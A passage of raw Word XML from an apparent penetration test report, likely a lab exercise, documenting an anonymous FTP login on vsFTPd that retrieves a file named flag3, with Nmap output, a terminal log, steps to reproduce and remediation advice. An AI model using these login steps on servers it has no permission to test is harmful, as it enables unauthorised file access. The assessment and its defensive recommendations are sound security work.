              <w:t xml:space="preserve">| ftp-syst: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="539D01EE" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t xml:space="preserve">|   STAT: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="495FF5C1" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t>| FTP server status:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0163D558" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t>|      Connected to 10.10.0.10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DFC377B" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t xml:space="preserve">|      Logged in as </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002318B9">
              <w:t>ftp</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7FE95175" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t>|      TYPE: ASCII</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34E6F0E9" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t>|      No session bandwidth limit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AB4FAC8" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t xml:space="preserve">|      Session timeout in seconds is </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002318B9">
              <w:t>300</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2C057FDB" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t xml:space="preserve">|      Control connection is plain </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002318B9">
              <w:t>text</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6A06CD0C" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t xml:space="preserve">|      Data connections will be plain </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002318B9">
              <w:t>text</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="21F5330E" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t xml:space="preserve">|      At session startup, client count was </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002318B9">
              <w:t>1</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="56B476ED" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t xml:space="preserve">|      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002318B9">
              <w:t>vsFTPd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002318B9">
              <w:t xml:space="preserve"> 3.0.3 - secure, fast, stable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64434FF1" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t>|_End of status</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="055EB555" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t xml:space="preserve">| </w:t>
            </w:r>
            <w:r w:rsidRPr="0056593D">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>ftp-anon: Anonymous FTP login allowed (FTP code 230)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D5F3D1F" w14:textId="77777777" w:rsidR="002318B9" w:rsidRPr="002318B9" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t>|_</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002318B9">
              <w:t>drwxr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002318B9">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002318B9">
              <w:t>xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002318B9">
              <w:t xml:space="preserve">-x    5 1000     1000         4096 Apr </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002318B9">
              <w:t>04  2021</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002318B9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002318B9">
              <w:t>gibson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4A9913F4" w14:textId="69B88D6D" w:rsidR="002318B9" w:rsidRPr="004E111C" w:rsidRDefault="002318B9" w:rsidP="002318B9">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A96F3C3" w14:textId="07077354" w:rsidR="003C219B" w:rsidRPr="004E111C" w:rsidRDefault="003C219B" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="533BA598" w14:textId="214E3742" w:rsidR="003C219B" w:rsidRDefault="0056593D" w:rsidP="003C219B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap Results</w:t>
      </w:r>
      <w:r w:rsidR="003C219B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507186DE" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="324C9D73" w14:textId="39AF6F97" w:rsidR="003C219B" w:rsidRPr="00AC67FD" w:rsidRDefault="0056593D" w:rsidP="003C219B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The assessors were able to access the </w:t>
      </w:r>
      <w:r w:rsidRPr="0056593D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0056593D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0056593D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directory by signing into FTP with the username </w:t>
      </w:r>
      <w:r w:rsidRPr="0056593D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>anonymous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and a random string for the password. While they were not able to store files or access much outside of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0056593D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0056593D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0056593D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directory, they used their access to download sensitive information such as </w:t>
      </w:r>
      <w:r w:rsidRPr="0056593D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>flag3</w:t>
      </w:r>
      <w:r>
        <w:t>. The below figure shows the assessment team’s terminal output during the FTP connection:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C219B" w14:paraId="4633CD6F" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5695067B" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>ftp 10.10.0.66 -p 9001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E26758D" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Connected to 10.10.0.66.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14786609" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>220 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vsFTPd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 3.0.3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69EF2981" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>Name (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>10.10.0.66:kali</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>): anonymous</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17182996" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>331 Please specify the password.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15000C4D" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Password: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DE4B147" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>230 Login successful.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0971B954" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Remote</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> system type is UNIX.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ADF7865" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Using binary mode to transfer files.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A1AB354" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D5E6214" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ftp&gt; cd </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gibson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="78E55475" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>250 Directory successfully changed.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10E5F961" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>ftp&gt; ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="619CAEDD" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>229 Entering Extended Passive Mode (|||34190|)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52ED5011" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>150 Here comes the directory listing.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="752578B6" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rw-rw-rw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">-    1 0        0           46037 Apr </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>03  2020</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> flag3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3994C478" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>226 Directory send OK.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B420E3B" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ftp&gt; get </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>flag3</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5028B0B8" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>local: flag3 remote: flag3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44106107" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>229 Entering Extended Passive Mode (|||41595|)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43672FBF" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>150 Opening BINARY mode data connection for flag3 (46037 bytes).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689F82EF" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>100% |************************************************************************************| 46037       17.89 MiB/s    00:00 ETA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A6EEEC7" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>226 Transfer complete.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D2882EE" w14:textId="1CCB2DF9" w:rsidR="003C219B" w:rsidRDefault="0056593D" w:rsidP="0056593D">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>46037 bytes received in 00:00 (15.24 MiB/s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1791F212" w14:textId="550049F2" w:rsidR="0056593D" w:rsidRPr="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anonymous FTP Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE80E2F" w14:textId="3827094F" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t>An attacker would be able to use this vulnerability to access files with sensitive information stored on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD0CDF5" w14:textId="77777777" w:rsidR="003C219B" w:rsidRDefault="003C219B" w:rsidP="003C219B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6B3E88" w14:textId="5F1A38B6" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Connect to the server through FTP using the following command:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0056593D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp 10.10.0.66 -p </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0056593D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>9001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C64C004" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enter </w:t>
      </w:r>
      <w:r w:rsidRPr="0056593D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>anonymous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> when prompted for the username.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AB50C2" w14:textId="469FF380" w:rsidR="003C219B" w:rsidRPr="00455A9D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enter any string for the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2122CA68" w14:textId="77777777" w:rsidR="00336FE0" w:rsidRPr="00D36E2B" w:rsidRDefault="00336FE0" w:rsidP="00336FE0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="19"/>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22900AD5" w14:textId="740A42FF" w:rsidR="00336FE0" w:rsidRDefault="00336FE0" w:rsidP="00336FE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00336FE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Disable anonymous access: </w:t>
      </w:r>
      <w:r>
        <w:t>The first and most important remediation recommendation is to disable anonymous access to the FTP server. This can be done by disabling the anonymous user account or by configuring the FTP server to require authentication for all user accounts. By requiring users to authenticate before accessing the server, organizations can ensure that only authorized users are able to access the files and data stored on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDFEEBA" w14:textId="784F4171" w:rsidR="00336FE0" w:rsidRDefault="00336FE0" w:rsidP="00336FE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00336FE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implement access controls:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access controls should be implemented to restrict access to sensitive files and data on the FTP server. This can be done </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>through the use of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file permissions, ACLs, or </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>RBAC. Users should only be granted access to the files and data that they need to perform their job functions, and access should be granted on a need-to-know basis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C46C38" w14:textId="3FD6176F" w:rsidR="00336FE0" w:rsidRDefault="00336FE0" w:rsidP="00336FE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00336FE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Encrypt file transfers:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> File transfers should be encrypted to prevent unauthorized access to data in transit. This can be done by implementing SSL/TLS encryption for FTP transfers, or by using SFTP (Secure File Transfer Protocol) or FTPS (FTP over SSL/TLS) instead of regular FTP. Encryption can help prevent eavesdropping and man-in-the-middle </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attacks, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can ensure that data is transferred securely between the client and server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EED72E" w14:textId="77777777" w:rsidR="00336FE0" w:rsidRPr="00455A9D" w:rsidRDefault="00336FE0" w:rsidP="00336FE0"/>
    <w:p w14:paraId="30C1E192" w14:textId="77777777" w:rsidR="00336FE0" w:rsidRDefault="00336FE0" w:rsidP="00336FE0">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Additional Resources</w:t>
      </w:r>
      <w:commentRangeEnd w:id="19"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:commentReference w:id="19"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F75A0F" w14:textId="480D0921" w:rsidR="00336FE0" w:rsidRDefault="00336FE0" w:rsidP="00336FE0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
